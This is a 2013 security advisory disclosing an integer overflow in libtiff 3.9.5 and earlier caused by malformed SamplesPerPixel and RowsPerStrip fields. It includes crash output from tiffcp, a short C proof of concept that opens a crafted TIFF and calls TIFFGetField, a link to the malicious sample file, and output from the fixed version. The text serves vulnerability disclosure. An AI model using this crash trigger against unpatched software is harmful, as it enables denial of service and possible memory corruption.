libtiff 3.9.5 Integer Overflow

2013-08-26T00:00:00
ID PACKETSTORM:122953
Type packetstorm
Reporter x90c
Modified 2013-08-26T00:00:00

Description

                                        
                                            `+----------------------------------------------------+  
| XADV-2013001 libtiff <= 3.9.5 integer overflow bug |  
+----------------------------------------------------+  
  
vulnerable versions:  
- libtiff 3.9.5 <=  
- libtiff 3.6.0  
  
not vulnerable versions:  
- libtiff 4.0.3  
- libtiff 4.0.2  
- libtiff 4.0.1  
- libtiff 4.0.0  
  
release path:  
4.0.3(latest) -> 4.0.2 -> 4.0.1 -> 4.0.0(patched)  
-> 3.9.5(vulnerable)  
  
testbed: linux distro  
type: local  
impact: medium  
vendor: http://www.remotesensing.org/libtiff  
author: x90c  
site: x90c.org  
email: geinblues@gmail.com  
  
==========  
abstract:  
==========  
  
I discovered libtiff TIFFOpen integer overflow bug   
by weird TIFFOpen call success with malformed tif  
image file!  
  
- tiffcp tool (tiffinfo, tiff2ps, ... also can test):  
Many times tiffcp execution ... often, it entered to   
tiffcp function in tiffcp tool after tiffopen. Often  
calling openSrcImage success. malformed tif image   
within count of SamplePerPixel or RowsPerStrip can be  
opened by TIFFOpen even though can't tiffcp, TIFFWrite  
Directory with the returned TIFF*  
  
- integer overflow to heap corruption:  
Malformed tif image file within SamplePerPixel   
and RowsPerStrip can be opened the malformed tif  
data. and can be calculated in other library  
functions it leads to integer overflow to memory  
corruption!  
  
- exploitation:  
Exploit tries many times to call TIFFOpen with  
malformed tif file. sometimes after, the target program  
used vulnerable libtiff can be corrupted if these two   
field will passed validation checks  
  
  
=========  
details:  
=========  
  
tiff-v3.6.0/tools/tiffcp  
  
Many times TIFFOpen calls  
----  
..  
[root@centos5 tools]# export SAMPLE=/home/x90c/sample_spp.tif  
[root@centos5 tools]# ./tiffcp -b $SAMPLE  
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.  
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.  
[root@centos5 tools]# ./tiffcp -b $SAMPLE  
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.  
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.  
[root@centos5 tools]# ./tiffcp -b $SAMPLE  
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.  
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.  
[root@centos5 tools]# ./tiffcp -b $SAMPLE  
samples=1392 imagewidth=2464 rowsperstrip=3248 // debug output  
Bias image must be monochrome  
[root@centos5 tools]#  
----  
As you see, malformed td_samplesperpixel(sampleperpixel  
field of tif image) count of 2 changes these values 1,0  
to a value of sample= of 1392(0x570). the invalid value  
can be calculated and integer overflow!  
  
  
===============  
exploit codes:  
===============  
  
tiff_poc.c  
--  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include "tiffio.h"  
  
int tiff_integer_overflow_test(){  
TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");  
int samples = 0;  
  
/*  
* for instance, TIFFGetField library function will  
* called with malicious samplesperpixel field value   
* TIFFGetField got segfault!  
*/  
TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);  
  
printf("tiff_poc: tif samplesperpixel field=%d\n", samples);  
}  
--  
  
- I attached the sample_spp.tif:  
http://www.x90c.org/exploits/sample_spp.tif  
  
  
=============  
patch codes:  
=============  
  
tiff-4.0.3/tools/tiffcp (latest version)  
  
----  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif  
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".  
[root@centos5 tools]#  
....  
..  
...  
..  
----  
safe!  
  
  
==============  
vendor status:  
==============  
2013/08/24 - I discovered the security bug  
2013/08/24 - the advisory released  
`